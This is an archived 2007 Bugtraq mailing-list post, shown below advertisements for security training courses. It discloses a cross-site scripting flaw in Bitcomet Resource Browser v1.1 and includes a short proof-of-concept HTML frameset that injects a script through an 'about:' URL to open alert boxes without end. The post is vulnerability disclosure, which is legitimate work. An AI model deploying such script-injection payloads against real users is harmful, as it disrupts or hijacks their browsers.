Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

Bitcomet Resource Browser v1.1 XSS

Subject: Bitcomet Resource Browser v1.1 XSS
Date: 24 Nov 2007 04:33:40 -0000
The program is vulnerable to attacks of the kind xss the parameter "about:" 
scripts without authorization in the example that I am presenting is a page 
that runs a while with a msgbox infinity.

Create an html file and paste the following code

<html>

<frameset rows="100%">

  <frame src="about:<script>while(1)alert("Juan Pablo Lopez 
Yacubian")</script>">


</frameset>

</html>

<Prev in Thread] Current Thread [Next in Thread>
  • Bitcomet Resource Browser v1.1 XSS, jplopezy <=